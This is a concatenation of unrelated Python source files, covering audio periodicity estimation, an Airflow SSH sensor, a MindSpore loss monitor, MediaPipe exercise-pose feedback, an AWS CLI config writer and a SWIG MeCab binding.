rdf_type = BASE_CONTEXT.base_namespace['Context']
imports = ObjectProperty(value_type=This,
multiple=True,
link=CONTEXT_IMPORTS)
|
"""
container for the Periodicity estimator
"""
from typing import List
import librosa
import numpy as np
from automix.featureExtraction.estimator import Estimator, Parameter
from automix.model.classes.signal import Signal
class Periodicity(Estimator):
"""
Estimator infering the periodicity of a track
inputFeatures: List of signals
The signals can be sparse or dense. The amplitude and the number of values on the period are taken into account.
outputPeriod: A sparse signal with a value at each point on the period.
paraeterDistanceMetric: compute how the values for the peaks is determined
RMS, SUM, Veire=SUM+Mult
parameterFeatureAggregation: how the feature are aggregated
qualitatively = by counting the number of features in agreement
Quantitatively = by summing the score of each feature
"""
def __init__(self,
inputFeatures=["cqtAmplitudeCheckerboard"],
inputGrid="strongBeats",
outputPeriod="period",
parameterDistanceMetric="RMS",
parameterFeatureAggregation="quantitative",
parameterPeriod=2,
cachingLevel=2,
forceRefreshCache=True): #As long as there is no way of updating the cache when the input changes
self.inputs = [inputFeatures, inputGrid]
self.outputs = [outputPeriod]
self.parameters = {"period": Parameter(parameterPeriod), "distanceMetric": Parameter(parameterDistanceMetric), "featureAggregation": Parameter(parameterFeatureAggregation)}
self.cachingLevel = cachingLevel
self.forceRefreshCache = forceRefreshCache
def predictOne(self, inputFeatures: List[Signal], inputGrid: Signal):
# for period in self.parameters["period"].value:
period = self.parameters["period"].value
phase = self.getPhase(period, inputFeatures, inputGrid)
return (Signal(inputGrid.values[phase::period], times=inputGrid.times[phase::period], sparse=True), )
def getPhase(self, period, features, inputGrid):
"""
Get the phase of the track depending on all the features specified and the period
TODO: The phase should be computed with all the features combined. not with all the features independent
"""
# Equal weight per feature
if self.parameters["featureAggregation"].value == "quantitative":
phasePerFeature = []
for feature in features:
bestPhase = np.argmax(self.findPhaseLocal(period, feature, inputGrid))
phasePerFeature.append(bestPhase)
counts = np.bincount(phasePerFeature)
quantitative = np.argmax(counts)
return quantitative
elif self.parameters["featureAggregation"].value == "qualitative":
# Equal weight maybe ? but qualitative value per phase for each feature
overalScore = np.zeros(period)
for feature in features:
score = self.findPhaseLocal(period, feature, inputGrid)
overalScore = np.add(score, overalScore)
qualitative = np.argmax(overalScore)
return qualitative
else:
raise Exception("bad feature aggregation parameter")
# different weight per feature
# binValues = []
# for phase in range(period):
# binValues.append([])
# for feature in features:
# binValues[phase] = [feature.getValue(inputGrid.times[i]) for i in range(phase, len(inputGrid), period)]
# binValues[phase] = [v for v in binValues[phase] if v is not None]
# # Veire's method. the best candidate is maximizing the number of peaks in phase AND the amplitude of the peaks
# binProduct = [np.sum(values) * len(values) for values in binValues]
# return np.argmax(binProduct)
def findPhaseLocal(self, period: int, signal: Signal, grid: Signal, toleranceWindow=0.1):
"""
find the phase of the signal based on it's amplitude at the grid positions and the number of peaks
- signal: works best with a discrete signal as no aglomeration is done
- grid: positions of the beats
- period: the periodicity to test
- tolerance window: if not at 0, returns the closest value in the signal to the grid, within the tolerance window
test:
# result = findPhase(Signal(np.ones(5), times=np.array([0, 4, 8, 9, 12])+1), Signal(np.ones(16), times=range(16)),
period=4)
# print(result) = 1
"""
phases = []
for phase in range(period):
values = [signal.getValue(grid.times[i], toleranceWindow=toleranceWindow) for i in range(phase, len(grid), period)]
values = [v for v in values if v is not None]
if self.parameters["distanceMetric"].value == "RMS":
value = np.sqrt(np.mean(np.array(values)**2))
elif self.parameters["distanceMetric"].value == "sum":
value = np.sum(values)
elif self.parameters["distanceMetric"].value == "Veire":
value = np.sum(values) * len(values)
else:
raise Exception("Bad distance metric parameter" + self.parameters["distanceMetric"].value )
phases.append(value)
# bestPhase = np.argmax(phases)
return phases
# p = Periodicity(parameterPeriod=4)
# print(p.predictOne([Signal(1, times=[5, 9, 14]), Signal(1, times=[6, 10])], Signal(1, times=range(30)))[0].times)
# print(p.predictOne([Signal(1, times=[5, 9, 6, 10, 14])], Signal(1, times=range(30)))[0].times)
|
# -*- coding: utf-8 -*-
"""A simple script for computing child model parameters and controller search space
complexities
ZZJ, 11.19.2019
"""
import numpy as np
def child_model_params(num_features, num_layers, max_units):
c = num_features * num_layers * max_units + (max_units * num_layers) ** 2 / 2
return c
def controller_search_space(input_blocks, output_blocks, num_layers, num_choices_per_layer):
s = np.log10(num_choices_per_layer) * num_layers
s += np.log10(2) * (num_layers-1)*num_layers/2
s += np.log10(input_blocks) * num_layers + np.log10(output_blocks) * num_layers
return s
|
from typing import Dict
from airflow.sensors.base_sensor_operator import BaseSensorOperator
from airflow.utils.decorators import apply_defaults
from sai_airflow_plugins.operators.fabric_operator import FabricOperator
class FabricSensor(BaseSensorOperator, FabricOperator):
"""
Executes a command on a remote host using the [Fabric](https://www.fabfile.org) library and returns True if and
only if the exit code is 0. Like `FabricOperator` it uses a standard `SSHHook` for the connection configuration.
The parameters for this sensor are the combined parameters of `FabricOperator` and `BaseSensorOperator`.
"""
@apply_defaults
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def poke(self, context: Dict) -> bool:
"""
Executes ``self.command`` over the configured SSH connection and checks its exit code.
:param context: Context dict provided by airflow
:return: True if the command's exit code was 0, else False.
"""
result = self.execute_fabric_command()
self.log.info(f"Fabric command exited with {result.exited}")
return not result.exited
|
import json
class Alpha:
def __init__(self):
self.a = json.loads('file_A')
self.b = json.loads('file_B')
self.c = None
self.d = None
def foo(self):
json.dumps(self.d)
def bar(self, dummy):
self.c = dummy.x
self.d = dummy.y
self.foo()
class Beta:
def __init__(self):
self.x = json.loads('file_X')
self.y = json.loads('file_Y') |
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""LossMonitor Callback class."""
import numpy as np
from mindspore.common.tensor import Tensor
from mindspore._checkparam import Validator
from ._callback import Callback
class LossMonitor(Callback):
"""
Monitor the loss in training.
If the loss is NAN or INF, it will terminate training.
Note:
If per_print_times is 0, do not print loss.
Args:
per_print_times (int): How many steps to print once loss. During sink mode, it will print loss in the
nearest step. Default: 1.
Raises:
ValueError: If per_print_times is not an integer or less than zero.
Examples:
>>> from mindspore import Model, nn
>>>
>>> net = LeNet5()
>>> loss = nn.SoftmaxCrossEntropyWithLogits(sparse=True, reduction='mean')
>>> optim = nn.Momentum(net.trainable_params(), 0.01, 0.9)
>>> model = Model(net, loss_fn=loss, optimizer=optim)
>>> data_path = './MNIST_Data'
>>> dataset = create_dataset(data_path)
>>> loss_monitor = LossMonitor()
>>> model.train(10, dataset, callbacks=loss_monitor)
"""
def __init__(self, per_print_times=1):
super(LossMonitor, self).__init__()
Validator.check_non_negative_int(per_print_times)
self._per_print_times = per_print_times
self._last_print_time = 0
def step_end(self, run_context):
"""
Print training loss at the end of step.
Args:
run_context (RunContext): Include some information of the model.
"""
cb_params = run_context.original_args()
loss = cb_params.net_outputs
if isinstance(loss, (tuple, list)):
if isinstance(loss[0], Tensor) and isinstance(loss[0].asnumpy(), np.ndarray):
loss = loss[0]
if isinstance(loss, Tensor) and isinstance(loss.asnumpy(), np.ndarray):
loss = float(np.mean(loss.asnumpy()))
cur_step_in_epoch = (cb_params.cur_step_num - 1) % cb_params.batch_num + 1
if isinstance(loss, float) and (np.isnan(loss) or np.isinf(loss)):
raise ValueError("epoch: {} step: {}. Invalid loss, terminating training.".format(
cb_params.cur_epoch_num, cur_step_in_epoch))
#In disaster recovery scenario, the cb_params.cur_step_num may be rollback to previous step
# and be less than self._last_print_time, so self._last_print_time need to be updated.
if self._per_print_times != 0 and (cb_params.cur_step_num <= self._last_print_time):
while cb_params.cur_step_num <= self._last_print_time:
self._last_print_time -=\
max(self._per_print_times, cb_params.batch_num if cb_params.dataset_sink_mode else 1)
if self._per_print_times != 0 and (cb_params.cur_step_num - self._last_print_time) >= self._per_print_times:
self._last_print_time = cb_params.cur_step_num
print("epoch: %s step: %s, loss is %s" % (cb_params.cur_epoch_num, cur_step_in_epoch, loss), flush=True)
|
import cv2
import numpy as np
import mediapipe as mp
np.random.seed(123)
class Point(object):
"""
Class to denote a joint in 2-D space
Arguments:
x, y : x-axis and y-axis co-ordinates
visibility : visibility score of the joint
"""
def __init__(self, x=0.0, y=0.0, visibility=0.0):
self.x = x
self.y = y
self.visibility = visibility
def __add__(self, other):
return Point(self.x+other.x, self.y+other.y, (self.visibility+other.visibility)*0.5)
def __sub__(self, other):
return Point(self.x-other.x, self.y-other.y, (self.visibility+other.visibility)*0.5)
def __mul__(self, num):
if (type(num) is int) or (type(num) is float):
return Point(self.x*num, self.y*num, self.visibility)
raise AttributeError("Multiplication allowed only with scalars")
def __repr__(self):
return "x=%f y=%f visibility=%f" %(self.x, self.y, self.visibility)
class FrameProcessor(object):
"""
Class containing utility methods for processing a frame and returning its
featurized form
"""
def __init__(self):
self.mp_pose = mp.solutions.pose
self.mp_drawing = mp.solutions.drawing_utils
self.mp_drawing_styles = mp.solutions.drawing_styles
self.point_names = ['NOSE','LEFT_SHOULDER','RIGHT_SHOULDER','LEFT_HIP','RIGHT_HIP',
'LEFT_ELBOW','RIGHT_ELBOW' ,'LEFT_WRIST','RIGHT_WRIST','LEFT_KNEE','RIGHT_KNEE',
'LEFT_ANKLE','RIGHT_ANKLE','LEFT_FOOT_INDEX','RIGHT_FOOT_INDEX']
def _get_frame_landmarks(self, frame):
# returns the landmarks if pose is detected in the given image frame array, else None
with self.mp_pose.Pose(static_image_mode=True,min_detection_confidence=0.3,min_tracking_confidence=0.4) as pose:
results = pose.process(frame)
return results.pose_landmarks
def _get_points_coordinates(self, pose_landmarks, frame_shape):
# returns the co-ordinates of the points after translational normalization
h, w = frame_shape[:2]
lhip, rhip = (pose_landmarks.landmark[self.mp_pose.PoseLandmark['LEFT_HIP']],
pose_landmarks.landmark[self.mp_pose.PoseLandmark['RIGHT_HIP']])
# find the mid-hip coordinates
mid_hips = Point((lhip.x+rhip.x)*0.5, (lhip.y+rhip.y)*0.5, (lhip.visibility+rhip.visibility)*0.5)
points = list()
for name in self.point_names:
point = pose_landmarks.landmark[self.mp_pose.PoseLandmark[name]]
points.append(Point((point.x-mid_hips.x)*w, (point.y-mid_hips.y)*h, point.visibility))
return points
def _get_distance(self, p1, p2):
# returns euclidean dist between two points
p = p1 - p2
return np.sqrt(p.x**2 + p.y**2)
def _get_angle(self, p1, p2, p3):
# returns anti-clockwise angle made by point 2 with point 1 and 3
ab, bc = p1-p2, p3-p2
dot_prod = (ab.x*bc.x)+(ab.y*bc.y)
mod_prod = np.sqrt((ab.x**2+ab.y**2)*(bc.x**2+bc.y**2))
angle = np.rad2deg(np.arccos(dot_prod/mod_prod)) # in degrees
det = ab.x*bc.y - ab.y*bc.x # determinant for correct quadrant
angle = 360-angle if det<0 else angle
return angle
def get_frame_features(self, frame):
""" returns the featurized form of the given frame(image array) """
pose_landmarks = self._get_frame_landmarks(frame)
features = None
self.coordinates = None
if pose_landmarks is not None:
# get all the required body points
(nose, left_shoulder, right_shoulder, left_hip, right_hip, left_elbow, right_elbow,
left_wrist, right_wrist, left_knee, right_knee, left_ankle, right_ankle,
left_foot_idx, right_foot_idx) = self._get_points_coordinates(pose_landmarks, frame.shape)
assert (nose.visibility>0.4), "Face not in frame"
assert (left_shoulder.visibility>0.4 and right_shoulder.visibility>0.4), "Shoulders not in frame"
assert (left_hip.visibility>0.4 and right_hip.visibility>0.4), "Body not in frame"
assert (left_foot_idx.visibility>0.4 and right_foot_idx.visibility>0.4), "Feet not in frame"
# calculate the torso length which will be used to normalise the distances
neck = (left_shoulder + right_shoulder)*0.5
torso_len = (self._get_distance(neck, left_hip) + self._get_distance(neck, right_hip))*0.5
# find body core - mid-point of line joining mid-shoulder and mid-hips
mid_hips = (left_hip + right_hip)*0.5
core = (neck + mid_hips)*0.5
# calculate distance features
dist_feats = np.array([
# distance of limbs from body core
self._get_distance(core, nose),
# self._get_distance(core, left_shoulder), self._get_distance(core, right_shoulder),
self._get_distance(core, left_elbow), self._get_distance(core, right_elbow),
self._get_distance(core, left_wrist), self._get_distance(core, right_wrist),
# self._get_distance(core, left_hip), self._get_distance(core, right_hip),
self._get_distance(core, left_knee), self._get_distance(core, right_knee),
self._get_distance(core, left_ankle), self._get_distance(core, right_ankle),
# 2-joints distances
self._get_distance(left_shoulder, left_wrist), self._get_distance(right_shoulder, right_wrist),
self._get_distance(left_hip, left_elbow), self._get_distance(right_hip, right_elbow),
self._get_distance(left_shoulder, left_knee), self._get_distance(right_shoulder, right_knee),
self._get_distance(left_hip, left_ankle), self._get_distance(right_hip, right_ankle),
self._get_distance(left_knee, left_foot_idx), self._get_distance(right_knee, right_foot_idx),
# cross joint distances
self._get_distance(left_wrist, right_wrist), self._get_distance(left_elbow, right_elbow),
self._get_distance(left_shoulder, right_shoulder), self._get_distance(left_hip, right_hip),
self._get_distance(left_knee, right_knee) #, self._get_distance(left_ankle, right_ankle)
])
# normalise dist features
dist_feats /= torso_len
# calculate angle features
ground = Point(core.x, frame.shape[0]-1, 0.9)
angle_feats = np.array([
# angles made by neck with both elbows, angles made by hips with both knees,
# spine angle, and body with respect to ground
self._get_angle(left_elbow, neck, right_elbow), self._get_angle(left_knee, mid_hips, right_knee),
self._get_angle(nose, neck, mid_hips), self._get_angle(nose, core, ground)
])
angle_feats /= 360.0
visibility_feats = np.array([
# visibility features of left and right profiles(upper and lower body)
(left_shoulder.visibility + left_hip.visibility)*0.5,
(left_hip.visibility + left_knee.visibility)*0.5,
(right_shoulder.visibility + right_hip.visibility)*0.5,
(right_hip.visibility + right_knee.visibility)*0.5
])
features = np.hstack((dist_feats, angle_feats, visibility_feats))
# Save the coordinates for pose checking later
self.coordinates = (nose, left_shoulder, right_shoulder, left_hip, right_hip, left_elbow, right_elbow,
left_wrist, right_wrist, left_knee, right_knee, left_ankle, right_ankle, left_foot_idx,
right_foot_idx, neck, torso_len, mid_hips, core, ground)
return features
def pose_corrector(self, pose_clas):
"""
This function checks the Pose for various key-points specific to it and recommends
changes to the user. It uses the stored co-ordinates of just previously featurized frame.
"""
feedback = list()
if self.coordinates is not None:
(nose, left_shoulder, right_shoulder, left_hip, right_hip, left_elbow, right_elbow,
left_wrist, right_wrist, left_knee, right_knee, left_ankle, right_ankle, left_foot_idx,
right_foot_idx, neck, torso_len, mid_hips, core, ground) = self.coordinates
if pose_clas.startswith('jumping_jacks'):
feet_width = self._get_distance(left_ankle, right_ankle)
shoulder_width = self._get_distance(left_shoulder, right_shoulder)
body_angle = self._get_angle(neck, core, mid_hips)
body_angle = min(body_angle, 360.0-body_angle)
if pose_clas=='jumping_jacks-start':
# feet should be around (2*shoulder width) apart, hands stretched straight
left_hand_angle = self._get_angle(left_shoulder, left_elbow, left_wrist)
left_hand_angle = min(left_hand_angle, 360-left_hand_angle)
right_hand_angle = self._get_angle(right_shoulder, right_elbow, right_wrist)
right_hand_angle = min(right_hand_angle, 360-right_hand_angle)
if(feet_width <= shoulder_width*0.85):
feedback.append("Your feet are too close when starting Jumping Jacks.")
if(feet_width > 2*shoulder_width):
feedback.append("Your feet are too wide when starting Jumping Jacks.")
if((left_hand_angle < 120 and left_hand_angle > 180) or (right_hand_angle < 120 and right_hand_angle > 180)):
feedback.append("Keep your arms straight while doing Jumping Jacks.")
if pose_clas=='jumping_jacks-end':
# Keep hands above head and legs (2-3 shoulder length) wide apart
if not(nose.y > left_wrist.y and nose.y > right_wrist.y):
feedback.append("Keep your arms above your head when ending Jumping Jacks.")
if(feet_width <= 1.5*shoulder_width):
feedback.append("Your feet are too close when ending Jumping Jacks.")
if(feet_width > 2.75*shoulder_width):
feedback.append("Your feet are too wide when ending Jumping Jacks.")
elif pose_clas.startswith('crunches'):
if pose_clas=='crunches-start':
body_angle = self._get_angle(neck, core, mid_hips)
body_angle = min(body_angle, 360.0-body_angle)
# Keep your body relaxed on ground
if body_angle > 190 or body_angle < 170:
feedback.append("Lie down in a relaxed way while starting crunches.")
if pose_clas=='crunches-end':
body_angle = self._get_angle(nose, core, mid_hips)
body_angle = min(body_angle, 360.0-body_angle)
# Keep your head slightly raised from ground
if body_angle < 120 or body_angle > 160:
feedback.append("Raise your head slightly from neck while ending crunches.")
elif pose_clas.startswith('lunges'):
body_angle = self._get_angle(neck, core, mid_hips)
body_angle = min(body_angle, 360.0-body_angle)
# core straight
if body_angle > 190 or body_angle < 170:
feedback.append("Keep your core straight while doing lunges.")
if pose_clas=='lunges-start':
pass
if pose_clas=='lunges-end':
# knees should not cross toes
left_leg_angle = self._get_angle(left_ankle, left_knee, left_hip)
left_leg_angle = min(left_leg_angle, 360.0-left_leg_angle)
right_leg_angle = self._get_angle(right_ankle, right_knee, right_hip)
right_leg_angle = min(right_leg_angle, 360.0-right_leg_angle)
if ((left_leg_angle > 100 or left_leg_angle < 80) or (right_leg_angle > 100 or right_leg_angle < 80)):
feedback.append("While doing lunges your knees should be at right angles.")
elif pose_clas.startswith('planks'):
# check if the whole body is in straight line -
# neck, core, mid-hips :: mid-hips, mid-knees, mid-ankle
upper_body_angle = self._get_angle(neck, core, mid_hips)
upper_body_angle = min(upper_body_angle, 360.0-upper_body_angle)
mid_knees = (left_knee + right_knee)*0.5
mid_ankle = (left_ankle + right_ankle)*0.5
lower_body_angle = self._get_angle(mid_hips, mid_knees, mid_ankle)
lower_body_angle = min(lower_body_angle, 360.0-lower_body_angle)
if upper_body_angle < 165 and upper_body_angle > 190:
feedback.append("Straighten your upper body while doing planks.")
if lower_body_angle < 165 and lower_body_angle > 190:
feedback.append("Straighten your lower body while doing planks.")
elif pose_clas.startswith('squats'):
if pose_clas=='squats-start':
pass
if pose_clas=='squats-end':
# knees should not cross toes
if (right_knee.x-right_hip.x >= 0):
# facing right
dist = right_foot_idx.x - right_knee.x
else:
dist = left_knee.x - left_foot_idx.x
if dist <= 0:
feedback.append("While doing squats your knees should not cross your toes.")
else:
pass
return " ".join(feedback) if len(feedback) else None
def lightcheck(self, frame):
"""
Function to check light conditions given an image frame
"""
thres, bright_thres, dark_thres = 0.3, 225, 30
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
total_pixels = np.size(gray)
dark_pixels = np.sum(gray <= dark_thres)
bright_pixels = np.sum(gray >= bright_thres)
light_status = None
if dark_pixels/total_pixels > thres:
light_status = "Please come to a lighted area."
elif bright_pixels/total_pixels > thres:
light_status = "Your screen is overexposed. Please adjust."
else:
pass
return light_status
if __name__ == '__main__':
import cv2
import time
from frame_extractor import FrameExtractor
fproc = FrameProcessor()
# fex = FrameExtractor(time_interval=50)
# user_frames = fex.get_frames('../../resources/videos/user_video_webcam.mp4')
# for frame in user_frames:
# start_time = time.time()
# frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
# feats = fproc.get_frame_features(frame)
# if feats is not None:
# print(feats.shape)
# else:
# print("No features")
# print("Time taken: %f" %(time.time()-start_time))
# print('-'*50)
|
# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
# Extracted from https://github.com/aws/aws-cli/blob/master/awscli/customizations/configure/writer.py
import os
import re
class SectionNotFoundError(Exception):
pass
class ConfigFileWriter(object):
SECTION_REGEX = re.compile(r'\[(?P<header>[^]]+)\]')
OPTION_REGEX = re.compile(
r'(?P<option>[^:=][^:=]*)'
r'\s*(?P<vi>[:=])\s*'
r'(?P<value>.*)$'
)
def update_config(self, new_values, config_filename):
"""Update config file with new values.
This method will update a section in a config file with
new key value pairs.
This method provides a few conveniences:
* If the ``config_filename`` does not exist, it will
be created. Any parent directories will also be created
if necessary.
* If the section to update does not exist, it will be created.
* Any existing lines that are specified by ``new_values``
**will not be touched**. This ensures that commented out
values are left unaltered.
:type new_values: dict
:param new_values: The values to update. There is a special
key ``__section__``, that specifies what section in the INI
file to update. If this key is not present, then the
``default`` section will be updated with the new values.
:type config_filename: str
:param config_filename: The config filename where values will be
written.
"""
section_name = new_values.pop('__section__', 'default')
if not os.path.isfile(config_filename):
self._create_file(config_filename)
self._write_new_section(section_name, new_values, config_filename)
return
with open(config_filename, 'r') as f:
contents = f.readlines()
# We can only update a single section at a time so we first need
# to find the section in question
try:
self._update_section_contents(contents, section_name, new_values)
with open(config_filename, 'w') as f:
f.write(''.join(contents))
except SectionNotFoundError:
self._write_new_section(section_name, new_values, config_filename)
def _create_file(self, config_filename):
# Create the file as well as the parent dir if needed.
dirname = os.path.split(config_filename)[0]
if not os.path.isdir(dirname):
os.makedirs(dirname)
with os.fdopen(os.open(config_filename,
os.O_WRONLY | os.O_CREAT, 0o600), 'w'):
pass
def _write_new_section(self, section_name, new_values, config_filename):
with open(config_filename, 'a') as f:
f.write('\n[%s]\n' % section_name)
contents = []
self._insert_new_values(line_number=0,
contents=contents,
new_values=new_values)
f.write(''.join(contents))
def _find_section_start(self, contents, section_name):
for i in range(len(contents)):
line = contents[i]
if line.strip().startswith(('#', ';')):
# This is a comment, so we can safely ignore this line.
continue
match = self.SECTION_REGEX.search(line)
if match is not None and self._matches_section(match,
section_name):
return i
raise SectionNotFoundError(section_name)
def _update_section_contents(self, contents, section_name, new_values):
# First, find the line where the section_name is defined.
# This will be the value of i.
new_values = new_values.copy()
# ``contents`` is a list of file line contents.
section_start_line_num = self._find_section_start(contents,
section_name)
# If we get here, then we've found the section. We now need
# to figure out if we're updating a value or adding a new value.
# There's 2 cases. Either we're setting a normal scalar value
# of, we're setting a nested value.
last_matching_line = section_start_line_num
j = last_matching_line + 1
while j < len(contents):
line = contents[j]
if self.SECTION_REGEX.search(line) is not None:
# We've hit a new section which means the config key is
# not in the section. We need to add it here.
self._insert_new_values(line_number=last_matching_line,
contents=contents,
new_values=new_values)
return
match = self.OPTION_REGEX.search(line)
if match is not None:
last_matching_line = j
key_name = match.group(1).strip()
if key_name in new_values:
# We've found the line that defines the option name.
# if the value is not a dict, then we can write the line
# out now.
if not isinstance(new_values[key_name], dict):
option_value = new_values[key_name]
new_line = '%s = %s\n' % (key_name, option_value)
contents[j] = new_line
del new_values[key_name]
else:
j = self._update_subattributes(
j, contents, new_values[key_name],
len(match.group(1)) - len(match.group(1).lstrip()))
return
j += 1
if new_values:
if not contents[-1].endswith('\n'):
contents.append('\n')
self._insert_new_values(line_number=last_matching_line + 1,
contents=contents,
new_values=new_values)
def _update_subattributes(self, index, contents, values, starting_indent):
index += 1
for i in range(index, len(contents)):
line = contents[i]
match = self.OPTION_REGEX.search(line)
if match is not None:
current_indent = len(
match.group(1)) - len(match.group(1).lstrip())
key_name = match.group(1).strip()
if key_name in values:
option_value = values[key_name]
new_line = '%s%s = %s\n' % (' ' * current_indent,
key_name, option_value)
contents[i] = new_line
del values[key_name]
if starting_indent == current_indent or \
self.SECTION_REGEX.search(line) is not None:
# We've arrived at the starting indent level so we can just
# write out all the values now.
self._insert_new_values(i - 1, contents, values, ' ')
break
else:
if starting_indent != current_indent:
# The option is the last option in the file
self._insert_new_values(i, contents, values, ' ')
return i
def _insert_new_values(self, line_number, contents, new_values, indent=''):
new_contents = []
for key, value in list(new_values.items()):
if isinstance(value, dict):
subindent = indent + ' '
new_contents.append('%s%s =\n' % (indent, key))
for subkey, subval in list(value.items()):
new_contents.append('%s%s = %s\n' % (subindent, subkey,
subval))
else:
new_contents.append('%s%s = %s\n' % (indent, key, value))
del new_values[key]
contents.insert(line_number + 1, ''.join(new_contents))
def _matches_section(self, match, section_name):
parts = section_name.split(' ')
unquoted_match = match.group(0) == '[%s]' % section_name
if len(parts) > 1:
quoted_match = match.group(0) == '[%s "%s"]' % (
parts[0], ' '.join(parts[1:]))
return unquoted_match or quoted_match
return unquoted_match
|
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.12
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info as _swig_python_version_info
from glob import glob
import platform
import distutils.sysconfig as config
import shutil as sh
import os
if platform.system() == "Windows":
# Windows lazy installation
for key in ["_MeCab", "_mecab"]:
mecab_lib = glob("%s/%s*" % (config.get_python_lib(), key))
if mecab_lib:
mecab_lib = mecab_lib[0]
mecab_dir = os.path.dirname(mecab_lib)
try:
sh.copy(mecab_lib, "%s/eunjeon/data/" % mecab_dir)
os.remove(mecab_lib)
except FileNotFoundError:
pass
break
instruction = '''ImportError has occured.
Please register mecab directory to path using following command:
# 64-bit
>set PATH=%PATH%;C:\\Program Files\\MeCab\\bin
# 32-bit
>set PATH=%PATH%;C:\\Program Files (x86)\\MeCab\\bin
WARNING: Those commands will only remain in current session.
'''
if _swig_python_version_info >= (2, 7, 0):
def swig_import_helper():
import importlib
pkg = __name__.rpartition('.')[0]
mname = '.'.join((pkg, "data", '_MeCab')).lstrip('.')
try:
return importlib.import_module(mname)
except ImportError:
try:
return importlib.import_module('_MeCab')
except ImportError:
if platform.system() == "Windows":
raise ImportError(instruction)
_MeCab = swig_import_helper()
del swig_import_helper
elif _swig_python_version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_MeCab', [dirname(__file__)])
except ImportError:
try:
import _MeCab
return _MeCab
except:
import eunjeon.data._MeCab as _MeCab
return _MeCab
try:
_mod = imp.load_module('_MeCab', fp, pathname, description)
finally:
if fp is not None:
fp.close()
return _mod
_MeCab = swig_import_helper()
del swig_import_helper
else:
import _MeCab
del _swig_python_version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
try:
import builtins as __builtin__
except ImportError:
import __builtin__
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr(self, class_type, name):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
raise AttributeError("'%s' object has no attribute '%s'" % (class_type.__name__, name))
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except __builtin__.Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except __builtin__.Exception:
class _object:
pass
_newclass = 0
class DictionaryInfo(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, DictionaryInfo, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, DictionaryInfo, name)
__repr__ = _swig_repr
__swig_getmethods__["filename"] = _MeCab.DictionaryInfo_filename_get
if _newclass:
filename = _swig_property(_MeCab.DictionaryInfo_filename_get)
__swig_getmethods__["charset"] = _MeCab.DictionaryInfo_charset_get
if _newclass:
charset = _swig_property(_MeCab.DictionaryInfo_charset_get)
__swig_getmethods__["size"] = _MeCab.DictionaryInfo_size_get
if _newclass:
size = _swig_property(_MeCab.DictionaryInfo_size_get)
__swig_getmethods__["type"] = _MeCab.DictionaryInfo_type_get
if _newclass:
type = _swig_property(_MeCab.DictionaryInfo_type_get)
__swig_getmethods__["lsize"] = _MeCab.DictionaryInfo_lsize_get
if _newclass:
lsize = _swig_property(_MeCab.DictionaryInfo_lsize_get)
__swig_getmethods__["rsize"] = _MeCab.DictionaryInfo_rsize_get
if _newclass:
rsize = _swig_property(_MeCab.DictionaryInfo_rsize_get)
__swig_getmethods__["version"] = _MeCab.DictionaryInfo_version_get
if _newclass:
version = _swig_property(_MeCab.DictionaryInfo_version_get)
__swig_getmethods__["next"] = _MeCab.DictionaryInfo_next_get
if _newclass:
next = _swig_property(_MeCab.DictionaryInfo_next_get)
def __init__(self):
this = _MeCab.new_DictionaryInfo()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _MeCab.delete_DictionaryInfo
__del__ = lambda self: None
DictionaryInfo_swigregister = _MeCab.DictionaryInfo_swigregister
DictionaryInfo_swigregister(DictionaryInfo)
class Path(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Path, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Path, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined")
__repr__ = _swig_repr
__swig_getmethods__["rnode"] = _MeCab.Path_rnode_get
if _newclass:
rnode = _swig_property(_MeCab.Path_rnode_get)
__swig_getmethods__["rnext"] = _MeCab.Path_rnext_get
if _newclass:
rnext = _swig_property(_MeCab.Path_rnext_get)
__swig_getmethods__["lnode"] = _MeCab.Path_lnode_get
if _newclass:
lnode = _swig_property(_MeCab.Path_lnode_get)
__swig_getmethods__["lnext"] = _MeCab.Path_lnext_get
if _newclass:
lnext = _swig_property(_MeCab.Path_lnext_get)
__swig_getmethods__["cost"] = _MeCab.Path_cost_get
if _newclass:
cost = _swig_property(_MeCab.Path_cost_get)
__swig_setmethods__["prob"] = _MeCab.Path_prob_set
